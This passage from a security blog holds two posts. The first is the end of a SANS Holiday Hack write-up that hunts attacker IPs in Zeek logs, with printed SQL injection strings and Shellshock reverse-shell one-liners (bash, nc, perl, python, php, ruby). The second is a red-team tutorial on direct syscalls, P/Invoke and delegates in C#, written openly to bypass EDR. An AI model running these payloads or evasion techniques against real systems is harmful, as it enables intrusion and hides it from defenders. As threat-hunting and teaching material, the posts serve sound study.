RookIE/1.0, IP: 45.239.232.245
RookIE/1.0, IP: 142.128.135.10
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 68.115.251.76
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 118.196.230.170
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 173.37.160.150
1' UNION SELECT 1,1409605378,1,1,1,1,1,1,1,1/*&blogId=1, IP: 81.14.204.154
1' UNION/**/SELECT/**/994320606,1,1,1,1,1,1,1/*&blogId=1, IP: 135.203.243.43
1' UNION SELECT 1729540636,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x65,0x72, --, IP: 186.28.46.179
1' UNION SELECT -1,'autosc','test','O:8:\"stdClass\":3:{s:3:\"mod\";s:15:\"resourcesmodule\";s:3:\"src\";s:20:\"@random41940ceb78dbb\";s:3:\"int\";s:0:\"\";}',7,0,0,0,0,0,0 /*, IP: 13.39.153.254
1' UNION SELECT '1','2','automatedscanning','1233627891','5'/*, IP: 111.81.145.191
1' UNION/**/SELECT/**/1,2,434635502,4/*&blog=1, IP: 0.216.249.31
() { :; }; /bin/bash -i >& /dev/tcp/31.254.228.4/48051 0>&1, IP: 31.254.228.4
() { :; }; /bin/bash -c '/bin/nc 55535 220.132.33.81 -e /bin/bash', IP: 220.132.33.81
() { :; }; /usr/bin/perl -e 'use Socket;$i="83.0.8.119";$p=57432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};', IP: 83.0.8.119
() { :; }; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.45.133.97",54611));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);', IP: 150.45.133.97
() { :; }; /usr/bin/php -r '$sock=fsockopen("229.229.189.246",62570);exec("/bin/sh -i <&3 >&3 2>&3");', IP: 229.229.189.246
() { :; }; /usr/bin/ruby -rsocket -e'f=TCPSocket.open("227.110.45.126",43870).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)', IP: 227.110.45.126
' or '1=1, IP: 33.132.98.193
' or '1=1, IP: 84.185.44.166
' or '1=1, IP: 254.140.181.172
' or '1=1, IP: 150.50.77.238
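
The same sweep can be sketched without shelling out to jq at all. The version below is a rough pure-Python equivalent under a few assumptions: the records are already loaded as a list of dictionaries, `INDICATORS` and `find_suspicious` are hypothetical names, and the indicator list is copied from the script above. It walks record by record rather than key by key, so the order of the hits will differ from the output shown.

```python
# Indicator strings copied from the jq query in the script above.
INDICATORS = [
    "%", "/etc/", "UNION", "SELECT", "{ :; }", "alert(", "../", "onerror",
    "onload", "RookIE", "WinInet", "CholTBAgent", "Metasploit", "Windos",
    "avdscan", "automatedscanning", "1=1", "base64", "/dev/tcp", "sock",
    "/bin/nc", "/bash",
]


def find_suspicious(records, indicators=INDICATORS):
    """Return (field, value, source IP) for every string field containing an indicator."""
    hits = []
    for rec in records:
        for key, value in rec.items():
            # Numeric fields such as ports and status codes cannot contain a substring.
            if isinstance(value, str) and any(tok in value for tok in indicators):
                hits.append((key, value, rec["id.orig_h"]))
    return hits


# Three trimmed records using values that appear earlier in this post.
sample = [
    {"uri": "/14.10/Google/", "id.orig_h": "238.27.231.56", "status_code": 404},
    {"uri": "/api/weather?station_id=/etc/passwd", "id.orig_h": "9.206.212.33"},
    {"user_agent": "() { :; }; /bin/bash -i >& /dev/tcp/31.254.228.4/48051 0>&1",
     "id.orig_h": "31.254.228.4"},
]

for field, value, ip in find_suspicious(sample):
    print(f"{value}, IP: {ip}")
```

Skipping non-string values up front also avoids the errors jq reports when `contains` is asked to compare a number against a string.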

Awesome, so it seems we have ~68 malicious IPs, but that’s not enough - the objective said we need at least 100. Well hold on, let’s think back to the talk with Wunorse.

If you remember correctly, he said something about “pivoting off other unusual attributes”. What can this mean? Well, by attributes I’m assuming the values in the Zeek log. Since we have a list of malicious IPs that were attacking the servers, what we can do is search for these IPs and grab their User Agents.

If whatever tool they used was the same and was just using a round robin style proxy, then their user agents will be a dead giveaway for other malicious IPs. With that, let’s modify our Python script to search for the user agents.

import os

f = open('malicious_ips.txt')
for line in f:
	command = 'cat http.log | jq -r \'.[] | select(.["id.orig_h"] | contains ("'+line.strip()+'"))\' | jq -j \'(.["id.orig_h"], ", UA: ", .["user_agent"], "\\n")\''
	os.system(command)

Executing that script should give us something similar to the following results:

root@kali:~/HH/sleigh_route# python3 run.py 
61.110.82.125, UA: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1
65.153.114.120, UA: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1
123.127.233.97, UA: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12
95.166.116.45, UA: Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
80.244.147.207, UA: Mozilla/5.0 (Linux; U; Android 4.1.1; en-gb; Build/KLP) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
168.66.108.62, UA: Mozilla/5.0 (Linux; Android 5.1.1; Nexus 5 Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.65 Mobile Safari/537.36
200.75.228.240, UA: Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
42.103.246.250, UA: Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)
56.5.47.137, UA: HttpBrowser/1.0
---snip---

Now that we have a list of malicious user agents, let’s clean them up, and save them to a new list. Once done, let’s go ahead and re-write our script to parse the user agents and get other IPs.

The final script should look like the following:

import os

f = open('malicious_agents.txt')
for line in f:
	command = 'cat http.log | jq -r \'.[] | select(.["user_agent"] | contains ("'+line.strip()+'"))\' | jq -j \'(.["id.orig_h"], "\\n")\''
	os.system(command)

Once again, we execute the script and get an output similar to the one below:

root@kali:~/HH/sleigh_route# python3 run.py 
61.110.82.125
65.153.114.120
123.127.233.97
95.166.116.45
80.244.147.207
168.66.108.62
200.75.228.240
42.103.246.250
42.103.246.130
42.103.246.130
42.103.246.130
42.103.246.130
56.5.47.137
118.26.57.38
---snip---

There seem to be a lot of duplicates, but don’t worry! Just add all these IPs to the previous list of malicious IPs, and sort by unique! Once that’s done, we should have about 166 possible malicious IPs.

root@kali:~/HH/sleigh_route# cat malicious_ips.txt | wc -l
166
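
The pivot and the de-duplication can also be sketched as a single pass in Python. This is a simplified sketch, not the scripts used above: `pivot_on_user_agents` is a hypothetical name, the records are assumed to be a list of dictionaries, and the pairing of the second and third sample IPs with their user agents is assumed purely for illustration.

```python
def pivot_on_user_agents(records, bad_ips):
    """Expand a set of known-bad IPs to every IP that shares a user agent with one of them."""
    bad_ips = set(bad_ips)
    # Step 1: collect the user agents seen from the known-bad IPs.
    bad_agents = {r["user_agent"] for r in records if r["id.orig_h"] in bad_ips}
    # Step 2: collect every IP that used one of those agents; the set removes duplicates.
    return {r["id.orig_h"] for r in records if r["user_agent"] in bad_agents}


# Trimmed records; which IP sent which user agent is assumed for illustration.
sample = [
    {"id.orig_h": "42.103.246.250",
     "user_agent": "Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)"},
    {"id.orig_h": "42.103.246.130",
     "user_agent": "Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)"},
    {"id.orig_h": "42.103.246.130",
     "user_agent": "Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)"},
    {"id.orig_h": "238.27.231.56",
     "user_agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)"},
]

for ip in sorted(pivot_on_user_agents(sample, ["42.103.246.250"])):
    print(ip)
```

One caveat: this matches user agents exactly and does no clean-up, so a common browser string shared by a bad IP and many legitimate visitors would pull all of them in. That is why the list of agents is reviewed by hand in the steps above before pivoting.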

With that, let’s add the IPs to the firewall, and press DENY. If done correctly, we should block most of the malicious IPs and help Santa get a proper route!

Once completed, we can navigate to the twelfth objective in our badge, and enter the RID of 0807198508261964 to complete the challenge!

Upon completing the objective, the door to the Bell Tower should now open for us.

Once we enter the Bell Tower, we spot Santa, Krampus and The Tooth Fairy!

Upon talking to Santa, we learn that we finally helped stop the sinister plot set out by the Tooth Fairy!

Hooray! We completed this year’s Holiday Hack, and what a learning adventure it has been!

Closing

As always, SANS has done an amazing job for this year’s Holiday Hack, especially since this year was way more blue team and defender focused, allowing us to learn about threat hunting and tools like Splunk.

Now, even though this was geared more toward the Blue Team, the Red Team learned a lot from this too. We now know how our attacks are detected and the kind of work we need to put in to avoid detection!

I’m really looking forward to next year’s challenge!

Cheers everyone, thanks for reading!

Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge

14 April 2020 at 00:00

Over the past year, the security community - specifically Red Team Operators and Blue Team Defenders - has seen a massive rise in both public and private utilization of System Calls in Windows malware for post-exploitation activities, as well as for the bypassing of EDR or Endpoint Detection and Response.

Now, to some, the utilization of this technique might seem foreign and brand new, but that’s not really the case. Many malware authors, developers, and even game hackers have been utilizing system calls and in-memory loading for years, with the initial goal of bypassing certain restrictions and securities put into place by tools such as anti-virus and anti-cheat engines.

Good examples of how these syscall techniques can be utilized were presented in a few blog posts, such as how to Bypass EDR’s Memory Protection, Introduction to Hooking by Hoang Bui and the greatest example of them all - Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR by Cneelis, which initially focused on utilizing syscalls to dump LSASS undetected. As a Red Teamer, the usage of these techniques was critical to covert operations - as it allowed us to carry out post exploitation activities within networks while staying under the radar.

Implementation of these techniques was mostly done in C++ so as to easily interact with the Win32 API and the system. But there was always one caveat to writing tools in C++, and that’s the fact that when our code compiled, we had an EXE. Now for covert operations to succeed, we as operators always wanted to avoid having to “touch the disk” - meaning that we didn’t want to blindly copy and execute files on the system. What we needed was a way to inject these tools into memory, which is more OPSEC (Operational Security) safe.

While C++ is an amazing language for anything malware related, I seriously started to look at integrating syscalls into C# as some of my post-exploitation tools began to transition in that direction. This accomplishment became more desirable to me after FuzzySec and The Wover released their BlueHatIL 2020 talk - Staying # and Bringing Covert Injection Tradecraft to .NET.

After some painstaking research, failed trial attempts, long sleepless nights, and a lot of coffee - I finally succeeded in getting syscalls to work in C#. While the technique itself was beneficial to covert operations, the code itself was somewhat cumbersome - you’ll understand why later.

Overall, the point of this blog post series will be to explore how we can use direct system calls in C# by utilizing unmanaged code to bypass EDR and API Hooking.

But before we can start writing the code to do that, we must first understand some basic concepts, such as how system calls work, and some .NET internals - specifically managed vs unmanaged code, P/Invoke, and delegates. Understanding these basics will really help us in understanding how and why our C# code works.

Alright, enough of my ramblings - let’s get into the basics!

Understanding System Calls

In Windows, the process architecture is split between two processor access modes - user mode and kernel mode. The idea behind the implementation of these modes was to protect user applications from accessing and modifying any critical OS data. User applications such as Chrome, Word, etc. all run in user mode, whereas OS code such as the system services and device drivers all run in kernel mode.

The kernel mode specifically refers to a mode of execution in a processor that grants access to all system memory and all CPU instructions. Some x86 and x64 processors differentiate between these modes by using another term known as ring levels.

Processors that utilize the ring level privilege mode define four privilege levels - otherwise known as rings - to protect system code and data. An example of these ring levels can be seen below.

Windows only utilizes two of these rings - Ring 0 for kernel mode and Ring 3 for user mode. Now, during normal processor operations, the processor will switch between these two modes depending on what type of code is running on the processor.

So what’s the reason behind this “ring level” of security? Well, when you start a user-mode application, Windows will create a new process for the application and will provide that application with a private virtual address space and a private handle table.

This “handle table” is a kernel object that contains handles. Handles are simply abstract reference values to specific system resources, such as a memory region or location, an open file, or a pipe. Their initial goal is to hide a real memory address from the API user, thus allowing the system to carry out certain management functions like reorganizing physical memory.

Overall, a handle’s job is to reference internal structures, such as Tokens, Processes, Threads, and more. An example of a handle can be seen below.

Because an application’s virtual address space is private, one application can’t alter the data that belongs to another application - unless the process makes part of its private address space available as a shared memory section via file mapping or via the VirtualProtect function, or unless one process has the right to open another process to use cross-process memory functions, such as ReadProcessMemory and WriteProcessMemory.

Now, unlike user mode, all the code that runs in kernel mode shares a single virtual address space called system space. This means that the kernel-mode drivers are not isolated from other drivers and the operating system itself. So if a driver accidentally writes to the wrong address space or does something malicious, then it can compromise the system or the other drivers. There are protections in place to prevent messing with the OS - like Kernel Patch Protection, aka PatchGuard - but let’s not worry about these.

Since the kernel houses most of the internal data structures of the operating system (such as the handle tables) anytime a user mode application needs to access these data structures or needs to call an internal Windows routine to carry out a privileged operation (such as reading a file), then it must first switch from user mode to kernel mode. This is where system calls come into play.

For a user application to access these data structures in kernel mode, the process utilizes a special processor instruction called “syscall”. This instruction triggers the transition between the processor access modes and allows the processor to access the system service dispatching code in the kernel. This in turn calls the appropriate internal function in Ntoskrnl.exe or Win32k.sys which house the kernel and OS application level logic.

An example of this “switch” can be observed in any application. For example, by utilizing Process Monitor on Notepad - we can view specific Read/Write operation properties and their call stack.

In the image above, we can see the switch from user mode to kernel mode. Notice how the Win32 API CreateFile function call follows directly before the Native API NtCreateFile call.

But, if we pay close attention we will see something odd. Notice how there are two different NtCreateFile function calls. One from the ntdll.dll module and one from the ntoskrnl.exe module. Why is that?

Well, the answer is pretty simple. The ntdll.dll DLL exports the Windows Native API. These native APIs from ntdll are implemented in ntoskrnl - you can view these as being the “kernel APIs”. Ntdll specifically supports functions and system service dispatch stubs that are used for executive functions.

Simply put, they house the “syscall” logic that allows us to transition our processor from user mode to kernel mode!

So what does this syscall CPU instruction actually look like in ntdll? Well, to inspect this, we can utilize WinDBG to disassemble and inspect the functions in ntdll.

Let’s begin by starting WinDBG and opening up a process like notepad or cmd. Once done, in the command window, type the following:

x ntdll!NtCreateFile

This simply tells WinDBG that we want to examine (x) the NtCreateFile symbol within the loaded ntdll module. After executing the command, you should see the following output.

00007ffd`7885cb50 ntdll!NtCreateFile (NtCreateFile)

The output provided to us is the memory address of where NtCreateFile is in the loaded process. From here to view the disassembly, type the following command:

u 00007ffd`7885cb50

This command tells WinDBG that we want to unassemble (u) the instructions at the beginning of the memory range specified. If run correctly, we should now see the following output.

Overall, the NtCreateFile function from ntdll is first responsible for setting up the function call’s arguments on the stack. Once done, the function then needs to move its relevant system call number into eax, as seen in the 2nd instruction, mov eax, 55. In this case the syscall number for NtCreateFile is 0x55.

Each native function has a specific syscall number. Now, these numbers tend to change between Windows updates - so at times it’s very hard to keep up with them. Thankfully, j00ru from Google Project Zero constantly updates his Windows X86-64 System Call Table, so you can use that as a reference anytime a new update comes out.

After the syscall number has been moved into eax, the syscall instruction is then called. Here is where the CPU will jump into kernel mode and carry out the specified privileged operation.

To do so, it will copy the function call’s arguments from the user mode stack into the kernel mode stack. It then executes the kernel version of the function call, which will be ZwCreateFile. Once finished, the routine is reversed and all return values will be returned to the user mode application. Our syscall is now complete!

Using Direct System Calls

Alright, so we know how system calls work, and how they are structured, but now you might be asking yourself… How do we execute these system calls?

It’s simple really. For us to directly invoke the system call, we will build the system call using assembly and execute that in our application’s memory space! This will allow us to bypass any hooked functions that are being monitored by EDRs or Anti-Virus. Of course syscalls can still be monitored and executing syscalls via C# still gives off a few hints - but let’s not worry about that as it’s not in scope for this blog post.

For example, if we wanted to write a program that utilizes the NtCreateFile syscall, we can build some simple assembly like so:

mov r10, rcx
mov eax, 0x55 ; NtCreateFile syscall identifier
syscall
ret
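
Since this stub eventually has to exist as raw bytes in memory, it can help to see what those four instructions assemble to. The Python sketch below only builds and prints the byte sequence using the usual x86-64 encodings for these instructions; it does not execute anything, and `build_syscall_stub` is a hypothetical helper name used purely for illustration.

```python
import struct


def build_syscall_stub(syscall_number):
    """Return the x86-64 machine code for a minimal direct-syscall stub."""
    return (
        b"\x4c\x8b\xd1"                                 # mov r10, rcx
        + b"\xb8" + struct.pack("<I", syscall_number)   # mov eax, <32-bit little-endian id>
        + b"\x0f\x05"                                   # syscall
        + b"\xc3"                                       # ret
    )


# 0x55 is the NtCreateFile identifier used in the assembly above.
stub = build_syscall_stub(0x55)
print(" ".join(f"{b:02x}" for b in stub))
```

The only part that changes from one native function to the next is the four-byte identifier after the `b8` opcode, which is why the same template can be reused by swapping in a different syscall number.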

Alright, so we have the assembly of our syscall… now what? How do we execute it in C#?

Well, in C++ this would be as simple as adding this to a new .asm file, enabling the masm build dependency, defining the C function prototype of our assembly, and simply initializing the variables and structures needed to invoke the syscall.

As easy as that sounds, it’s not that simple in C#. Why? Two words - Managed Code.

Understanding C# and the .NET Framework

Before we dive any deeper into understanding what this “Managed Code” is and why it’s going to cause us headaches - we need to understand what C# is and how it runs on the .NET Framework.

Simply, C# is a type-safe object-oriented language that enables developers to build a variety of secure and robust applications. Its syntax simplifies many of the complexities of C++ and provides powerful features such as nullable types, enumerations, delegates, lambda expressions, and direct memory access. C# also runs on the .NET Framework, which is an integral component of Windows that includes a virtual execution system called the Common Language Runtime or CLR and a unified set of class libraries. The CLR is the commercial implementation by Microsoft of the Common Language Infrastructure known as the CLI.

Source code written in C# is compiled into an Intermediate Language (IL) that conforms to the CLI specification. The IL code and resources, such as bitmaps and strings, are stored on disk in an executable file called an assembly, typically with an extension of .exe or .dll.

When a C# program is executed, the assembly is loaded into the CLR, and the CLR then performs Just-In-Time (JIT) compilation to convert the IL code to native machine instructions. The CLR also provides other services such as automatic garbage collection, exception handling, and resource management. Code that’s executed by the CLR is sometimes referred to as “managed code”, in contrast to “unmanaged code”, which is compiled directly into native machine code for a specific system.

To put it very simply, managed code is just that: code whose execution is managed by a runtime. In this case, the runtime is the Common Language Runtime.

In terms of unmanaged code, it simply relates to C/C++ and how the programmer is in charge of pretty much everything. The actual program is, essentially, a binary that the operating system loads into memory and starts. Everything else, from memory management to security considerations, is a burden of the programmer.

A good visual example of how the .NET Framework is structured and how it compiles C# to IL then to machine code can be seen below.

Now, if you actually read all that, then you will have noticed that I mentioned that the CLR provides other services such as “garbage collection”. In the CLR, the garbage collector, also known as the GC, serves as the automatic memory manager by essentially… you know, “freeing the garbage” that is your used memory. It also allocates objects on the managed heap, reclaims objects, clears memory, and provides memory safety by preventing known memory corruption issues like Use After Free.

Now, while C# is a great language, and it provides some amazing features and interoperability with Windows - like in-memory execution and such - it does have a few caveats and downsides when it comes to coding malware or trying to interact with the system. Some of these issues are:

  1. It’s easy to disassemble and reverse engineer C# assemblies via tools like dnSpy all because they are compiled into IL and not native code.
  2. It requires .NET to be present on the system for it to execute.
  3. It’s harder to do anti-debugging tricks in .NET than in native code.
  4. It requires more work and code to interoperate (interop) between managed and unmanaged code.

In the case of this blog post, #4 is the one that will cause us the most pain when coding syscalls in C#.

Whatever we do in C# is “managed” - so how are we able to efficiently interact with the Windows system and processor?

This question is especially important for us since we want to execute assembly code, and unfortunately for us, there is no inline ASM in C# like there is in C++ with the masm build dependencies.

Well, thankfully for us, Microsoft provided a way for us to be able to do that! And it’s all thanks to the CLR! Thanks to how the CLR was constructed, it actually allows us to pass the boundaries between the managed and unmanaged world. This process is known as interoperability or interop for short. With interop, C# supports pointers and the concept of “unsafe” code for those cases in which direct memory access is critical - that would be us! 😉

Overall this means that we can now do the same things C++ can, and we can also utilize the same Windows API functions… but, with some major - I mean… minor headaches and inconveniences… heh. 😅

Of course, it is important to note that once the code passes the boundaries of the runtime, the actual management of the execution is again in the hands of unmanaged code, and thus falls under the same restrictions as it would when we code in C++. Thus we need to be careful about how we allocate, deallocate, and manage memory as well as other objects.

So, knowing this, how are we able to enable this interoperability in C#? Well, let me introduce you to the star of the hour - P/Invoke (short for Platform Invoke)!

Understanding Native Interop via P/Invoke

P/Invoke is a technology that allows you to access structs, callbacks, and functions in unmanaged libraries (meaning DLLs and such) from your managed code. Most of the P/Invoke API that allows this interoperability is contained within two namespaces - specifically System and System.Runtime.InteropServices.

So let’s see a simple example. Let’s say you wanted to utilize the MessageBox function in your C# code - which usually you can’t call unless you’re building a UWP app.

For starters, let’s create a new .cs file and make sure we include the two P/Invoke namespaces.

using System;
using System.Runtime.InteropServices;

public class Program
{
    public static void Main(string[] args)
    {
        // TODO
    }
}

Now, let's take a quick look at the C MessageBox syntax that we want to use.

int MessageBox(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType
);

Now for starters you must know that the data types in C++ do not match those used in C#. That means data types such as HWND (handle to a window) and LPCTSTR (Long Pointer to Constant TCHAR String) are not valid in C#.

We'll briefly go over converting these data types for MessageBox now so you get a general idea - but if you want to learn more then I suggest you go read about the C# Types and Variables.

So for any handle objects related to C++, such as HWND, the equivalent of that data type (and any pointer in C++) in C# is the IntPtr Struct, which is a platform-specific type that is used to represent a pointer or a handle.

Any strings or pointer to string data types in C++ can be set to the C# equivalent - which is simply string. And UINT, an unsigned integer, maps directly to uint in C#.

Alright, now that we know the different data types, let's go ahead and declare the unmanaged MessageBox function in our code.

Our code should now look something like this.

using System;
using System.Runtime.InteropServices;

public class Program
{
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        // TODO
    }
}

Take note that before we declare our unmanaged function, we apply the DllImport attribute. This attribute is crucial because it tells the runtime that it should load the unmanaged DLL. The string passed in is the target DLL that we want to load - in this case user32.dll, which houses the function logic of MessageBox.

Additionally, we specify which character set to use for marshalling the strings. We also specify that this function calls SetLastError and that the runtime should capture that error code, so that we can retrieve it via Marshal.GetLastWin32Error() if the function fails.

Finally, you see that we create a private and static MessageBox function with the extern keyword. This extern modifier is used to declare a method that is implemented externally. Simply put, this tells the runtime that when you invoke this function, the runtime should find it in the DLL specified in the DllImport attribute - which in our case will be user32.dll.

Once we have all that, we can finally go ahead and call the MessageBox function within our main program.

using System;
using System.Runtime.InteropServices;

public class Program
{
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        MessageBox(IntPtr.Zero, "Hello from unmanaged code!", "Test!", 0);
    }
}

If done correctly, this should now display a new message box with the title "Test!" and a message of "Hello from unmanaged code!".

Awesome, so we just learned how to import and invoke unmanaged code from C#! It's actually pretty simple when you look at it... but don't let that fool you!

This was just a simple function - what happens if the function we want to call is a little more complex, such as the CreateFileA function?

Let's take a quick look at the C syntax for this function.

HANDLE CreateFileA(
  LPCSTR                lpFileName,
  DWORD                 dwDesiredAccess,
  DWORD                 dwShareMode,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  DWORD                 dwCreationDisposition,
  DWORD                 dwFlagsAndAttributes,
  HANDLE                hTemplateFile
);

Let's look at the dwDesiredAccess parameter, which specifies the access permissions of the file we create by using generic values such as GENERIC_READ and GENERIC_WRITE. In C++ we could simply use these values and the system will know what we mean, but not in C#.

Upon looking into the documentation we will see that the Generic Access Rights used for the dwDesiredAccess parameter use an Access Mask Format to specify what privileges we are requesting on the file. Since this parameter accepts a DWORD, which is a 32-bit unsigned integer, we quickly learn that the GENERIC_* constants are actually flags, each mapping to a specific bit in the access mask.

In the case of C#, to do the same, we would have to create a new enum type with the [Flags] attribute that contains the same constants and values that C++ has for this function to work properly.
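To make the flags idea a bit more concrete, here is a minimal sketch of how such an enum combines into a single DWORD-sized mask. The names GenericAccess and FlagsDemo are made up for this illustration; only the GENERIC_* bit values come from the Windows documentation.

```csharp
using System;

// Hypothetical enum name; the values mirror the documented GENERIC_* access rights.
[Flags]
public enum GenericAccess : uint
{
    None           = 0,
    GenericAll     = 0x10000000,
    GenericExecute = 0x20000000,
    GenericWrite   = 0x40000000,
    GenericRead    = 0x80000000
}

public static class FlagsDemo
{
    // Combine read and write access into one 32-bit access mask.
    public static GenericAccess ReadWrite()
    {
        return GenericAccess.GenericRead | GenericAccess.GenericWrite;
    }

    public static void Main()
    {
        GenericAccess access = ReadWrite();

        // Show the raw mask value that would be handed to the native function.
        Console.WriteLine("0x{0:X8}", (uint)access);

        // Test whether a single flag is present in the combined mask.
        Console.WriteLine((access & GenericAccess.GenericWrite) != 0);
    }
}
```

Because the enum is backed by uint, the combined value can be passed anywhere the native signature expects a DWORD.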

Now you might be asking me - where would I get such details? Well, the best resource for you to utilize in this case - and any case where you have to deal with unmanaged code in .NET - is the PInvoke Wiki. You'll find pretty much anything and everything that you need there.

If we were to invoke this unmanaged function in C# and have it work properly, a sample of the code would look something like this:

using System;
using System.Runtime.InteropServices;

public class Program
{
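    // EFileShare, ECreationDisposition and EFileAttributes are enums that
    // still need to be defined alongside EFileAccess (omitted for brevity).
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]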
    public static extern IntPtr CreateFile(
        string lpFileName,
        EFileAccess dwDesiredAccess,
        EFileShare dwShareMode,
        IntPtr lpSecurityAttributes,
        ECreationDisposition dwCreationDisposition,
        EFileAttributes dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    [Flags]
    public enum EFileAccess : uint
    {
        Generic_Read = 0x80000000,
        Generic_Write = 0x40000000,
        Generic_Execute = 0x20000000,
        Generic_All = 0x10000000
    }

    public static void Main(string[] args)
    {
        // TODO Code Here for CreateFile
    }
}

Now do you see what I meant when I said that utilizing unmanaged code in C# can be cumbersome and inconvenient? Good, so we're on the same page now 😁

Alright, so we've covered a lot of material already. We understand how system calls work, we know how C# and the .NET framework function on a lower level, and we now know how to invoke unmanaged code and Win32 APIs from C#.

But, we're still missing a critical piece of information. What could that be... 🤔

Oh, that's right! Even though we can call Win32 API functions in C#, we still don't know how to execute our "native code" assembly.

Well, you know what they say - "If there's a will, then there's a way"! And thanks to C#, even though we can't execute inline assembly like we can in C++, we can do something similar thanks to something lovely called Delegates!

Understanding Delegates and Native Code Callbacks

Can we just stop for a second and actually admire how cool the CLR really is? I mean to manage code, and to allow interop between the GC and the Windows APIs is actually pretty cool.

The runtime is so cool, that it also allows communication to flow in both directions, meaning that you can call back into managed code from native functions by using function pointers! Now, the closest thing to a function pointer in managed code is a delegate, which is a type that represents references to methods with a particular parameter list and return type. And this is what is used to allow callbacks from native code into managed code.

Simply put, delegates are used to pass methods as arguments to other methods. The use of this feature is similar to how one would go from managed to unmanaged code. A good example of this is given by Microsoft.

using System;
using System.Runtime.InteropServices;

namespace ConsoleApplication1
{
    public static class Program
    {
        // Define a delegate that corresponds to the unmanaged function.
        private delegate bool EnumWindowsProc(IntPtr hwnd, IntPtr lParam);

        // Import user32.dll (containing the function we need) and define
        // the method corresponding to the native function.
        [DllImport("user32.dll")]
        private static extern int EnumWindows(EnumWindowsProc lpEnumFunc, IntPtr lParam);

        // Define the implementation of the delegate; here, we simply output the window handle.
        private static bool OutputWindow(IntPtr hwnd, IntPtr lParam)
        {
            Console.WriteLine(hwnd.ToInt64());
            return true;
        }

        public static void Main(string[] args)
        {
            // Invoke the method; note the delegate as a first parameter.
            EnumWindows(OutputWindow, IntPtr.Zero);
        }
    }
}

So this code might look a little complex, but trust me - it's not! Before we walk through this example, let's make sure we review the signatures of the unmanaged functions that we need to work with.

As you can see, we are importing the native code function EnumWindows, which enumerates all top-level windows on the screen by passing the handle of each window, in turn, to an application-defined callback function.

If we take a peek at the C syntax for the function type we will see the following:

BOOL EnumWindows(
  WNDENUMPROC lpEnumFunc,
  LPARAM      lParam
);

If we look at the lpEnumFunc parameter in the documentation, we will see that it accepts a pointer to an application-defined callback - which should follow the same structure as the EnumWindowsProc callback function. This callback is simply a placeholder name for the application-defined function. Meaning that we can call it anything we want in the application.

If we take a peek at this function's C syntax we will see the following.

BOOL CALLBACK EnumWindowsProc(
  _In_ HWND   hwnd,
  _In_ LPARAM lParam
);

As you can see, this function's parameters accept an HWND, which is a handle to a window, and an LPARAM, which is a pointer-sized application-defined value. The return value for this callback is a boolean - true to continue the enumeration, or false to stop it.

Now, if we look back into our code, we first define the EnumWindowsProc delegate, which matches the signature of the callback from unmanaged code. Since we are doing this in C#, we replaced the C++ handle and pointer-sized types with IntPtr - which is the C# equivalent of pointers.

Next, with the DllImport attribute, we import the EnumWindows function from user32.dll.

After that, in OutputWindow, we implement the delegate. This is where we actually tell C# what we want to do with the data that is passed to us from unmanaged code. Here we simply print each window handle to the console.

And finally, in Main, we call our imported native method and pass our defined and implemented delegate to handle the returned data.

Simple!

Alright, so this is pretty cool. And I know... you might be asking me right now - "Jack, what's this have to do with executing our native assembly code in C#? We still don't know how to accomplish that!"

And all I have to say for myself is this meme...

There's a reason why I wanted to teach you about delegates and native code callbacks before we got here, as delegates are a very important part of what we will cover next.

Now, we learned that delegates are similar to C++ function pointers, but delegates are fully object-oriented, and unlike C++ pointers to member functions, delegates encapsulate both an object instance and a method. We also know that they allow methods to be passed as parameters and can also be used to define callback methods.
